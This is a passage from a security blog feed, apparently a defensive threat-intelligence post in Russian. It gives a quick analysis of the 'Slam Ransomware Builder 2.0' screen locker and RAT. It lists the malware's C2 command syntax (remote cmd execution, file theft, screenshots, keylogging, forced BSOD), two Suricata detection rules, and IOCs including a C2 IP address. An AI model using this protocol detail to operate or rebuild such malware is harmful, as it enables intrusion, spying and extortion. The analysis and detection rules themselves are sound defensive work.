<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2024/10/photo_105@31-10-2024_18-16-17-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/10/photo_105@31-10-2024_18-16-17-1024x1024.jpg 1024w, /wp-content/uploads/2024/10/photo_105@31-10-2024_18-16-17-300x300.jpg 300w, /wp-content/uploads/2024/10/photo_105@31-10-2024_18-16-17-150x150.jpg 150w, /wp-content/uploads/2024/10/photo_105@31-10-2024_18-16-17-768x768.jpg 768w, /wp-content/uploads/2024/10/photo_105@31-10-2024_18-16-17.jpg 1280w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<p><span class="hashtag">#hunt</span> <span class="hashtag">#IOC</span> <span class="hashtag">#yara</span> <span class="hashtag">#dfir</span> <span class="hashtag">#detect</span> <span class="hashtag">#win</span><br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a></p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Slam screen locker. Что ты такое?</title>
		<link>/slam-screen-locker-what-are-you/</link>
		
		<dc:creator><![CDATA[global_author]]></dc:creator>
		<pubDate>Thu, 10 Oct 2024 18:53:19 +0000</pubDate>
				<category><![CDATA[Разное]]></category>
		<category><![CDATA[C2]]></category>
		<category><![CDATA[detect]]></category>
		<category><![CDATA[hunt]]></category>
		<category><![CDATA[ioc]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[network]]></category>
		<category><![CDATA[suricata]]></category>
		<category><![CDATA[tips]]></category>
		<guid isPermaLink="false">http://localhost:8080/slam-screen-locker-%d1%87%d1%82%d0%be-%d1%82%d1%8b-%d1%82%d0%b0%d0%ba%d0%be%d0%b5/</guid>

					<description><![CDATA[Slam screen locker. Что ты такое? ☹️ На очереди — fast malware analysis, проведенный одним воскресным вечером. В наши сети залетел один интересный семпл, порождающий не менее интересный сетевой трафик (скриншот 1).…]]></description>
										<content:encoded><![CDATA[<strong>Slam screen locker. Что ты такое?</strong> ☹️<br />
<br />
На очереди — <strong>fast malware analysis</strong>, проведенный одним воскресным вечером.<br />
<br />
В наши сети залетел один интересный семпл, порождающий не менее интересный сетевой трафик (<em>скриншот 1</em>).<br />
<br />
В этом файле (исполняемом .NET) содержится необфусцированный неймспейс <strong>Slam_Ransomware_Builder_2._0</strong> (<em>скриншот 2</em>). Его название череcчур сильно похоже на известный в узких кругах <strong>Slam Ransomware</strong>, только версией побольше. Пример работы билдера 1.4 — <a href="https://app.any.run/tasks/7c513f90-4a37-4f58-b612-8c4fdd0925f6" rel="noopener" target="_blank">по ссылке.</a><br />
<br />
🏃‍♂️ Беглый анализ показал, что класс <strong>Slam_Ransomware_Builder_2._0.Lock</strong> отвечает за блокировку экрана, класс <strong>Slam_Ransomware_Builder_2._0.Chat</strong> реализует логику чата с жертвой локера. <br />
<br />
Наибольший интерес вызывает класс <strong>ClientTest.ChatClient</strong>, содержащий реализацию сетевого протокола. По нему можно определить полный набор функций исследуемого ВПО.<br />
<br />
<strong>• удаленное управление</strong> (например, LCD*&lt;coord_x&gt;*&lt;coord_y&gt; — эмуляция нажатия левой кнопки мыши, Command#&lt;command&gt; — выполнение команды в cmd, SetStartup*&lt;prog_name&gt; — добавление программы в автозапуск);<br />
<br />
<strong>• отправка и получение файлов</strong> (например, ViewFiles*&lt;dir_path&gt;, клиент отсылает в ответ *FileTree*&lt;files&gt;*FileTree*, скриншот 3);<br />
<br />
<strong>• снятие скриншотов</strong> (например, StartScreenShare*, StopScreenShare*, клиент отсылает в ответ SCREENSHOT*screen.jpg*&lt;file_size&gt;*&lt;user_name&gt;*&lt;form_id&gt;);<br />
<br />
<strong>• кейлоггер</strong> (например, StartRealtimekeylogger*, StopRealtimekeylogger*, клиент отсылает в ответ SendrtKeylogger*&lt;key_code&gt;*).<br />
<br />
<strong>И еще много всего</strong> — масштаб RAT поражает, любой клиент видео-конференц-связи позавидует.<br />
<br />
😃 <strong>Самые неприятные и интересные пакости</strong><br />
<br />
<strong>Команда:</strong> LOCK*, LOCKUN*.<br />
<strong>Действие:</strong> активировать или деактивировать локер рабочего стола.<br />
<br />
<strong>Команда:</strong> textts*&lt;text_to_speek&gt;.<br />
<strong>Действие:</strong> text to speech.<br />
<br />
<strong>Команда:</strong> msgboxshow*&lt;title&gt;*&lt;msg&gt;*{Error,Information,Hand&#8230;}*&lt;buttons&gt;.<br />
<strong>Действие:</strong> показать уведомление.<br />
<br />
<strong>Команда:</strong> Wallpaper*&lt;path_to_img&gt;.<br />
<strong>Действие: </strong>изменить изображение рабочего стола.<br />
<br />
<strong>Команда:</strong> BSOD#.<br />
<strong>Действие:</strong> вызвать синий экран смерти.<br />
<br />
А на самом первом скриншоте представлен PING-PONG, который без труда покрывается правилами с флоубитами:<br />
<br />
<pre class="wp-block-code"><span><code lang="plaintext" class="hljs language-plaintext language-plaintext">
alert tcp $EXTERNAL_NET any -&gt; $HOME_NET any (msg: "Slam V2.0 FB set ping"; flow: established, to_client; dsize: 8&lt;&gt;17; content: "?PING"; endswith; flowbits: set, slam_ping; flowbits: noalert; sid: 1; rev: 1; classtype: trojan-activity;)

alert tcp $HOME_NET any -&gt; $EXTERNAL_NET any (msg: "Slam V2.0 ping-pong"; flow: established, to_server; dsize: 8&lt;&gt;17; content: "PONG#"; startswith; content: "#"; endswith; flowbits: isset, slam_ping; threshold: type limit, track by_dst, count 2, seconds 240; sid: 2; rev: 1; classtype: trojan-activity;)
</code></span></pre><br />
<br />
<strong>IOCs</strong><br />
<br />
<pre class="wp-block-code"><span><code lang="yaml" class="hljs language-yaml language-yaml">
<span class="hljs-attr">SHA-256:</span> <span class="hljs-string">e42088a37531929e3e775bdfacc5a3ee974e4f59d5290907c2131f434eef345b</span>
<span class="hljs-attr">C2:</span> <span class="hljs-number">77.231</span><span class="hljs-number">.153</span><span class="hljs-number">.42</span>
</code></span></pre><br />
<br />
Happy hunting!

<figure class="wp-block-image"><img width="1024" height="1024" src="/wp-content/uploads/2024/10/photo_86@10-10-2024_18-53-19-1024x1024.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/10/photo_86@10-10-2024_18-53-19-1024x1024.jpg 1024w, /wp-content/uploads/2024/10/photo_86@10-10-2024_18-53-19-300x300.jpg 300w, /wp-content/uploads/2024/10/photo_86@10-10-2024_18-53-19-150x150.jpg 150w, /wp-content/uploads/2024/10/photo_86@10-10-2024_18-53-19-768x768.jpg 768w, /wp-content/uploads/2024/10/photo_86@10-10-2024_18-53-19.jpg 1098w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>
<figure class="wp-block-image"><img width="1024" height="683" src="/wp-content/uploads/2024/10/photo_87@10-10-2024_18-53-19-1024x683.jpg" class="attachment-large size-large" alt="" decoding="async" loading="lazy" srcset="/wp-content/uploads/2024/10/photo_87@10-10-2024_18-53-19-1024x683.jpg 1024w, /wp-content/uploads/2024/10/photo_87@10-10-2024_18-53-19-300x200.jpg 300w, /wp-content/uploads/2024/10/photo_87@10-10-2024_18-53-19-768x512.jpg 768w, /wp-content/uploads/2024/10/photo_87@10-10-2024_18-53-19.jpg 1200w" sizes="auto, (max-width: 1024px) 100vw, 1024px" /></figure>

<br />
<br />
<span class="hashtag">#Hunt</span> <span class="hashtag">#C2</span> <span class="hashtag">#Tips</span> <span class="hashtag">#IOC</span> <span class="hashtag">#detect</span> <span class="hashtag">#malware</span> <span class="hashtag">#network</span> <span class="hashtag">#suricata</span><br />
<br />
<a href="https://t.me/ptescalator" rel="noopener" target="_blank">@ptescalator</a>]]></content:encoded>
					
		
		
			</item>
	</channel>
</rss>
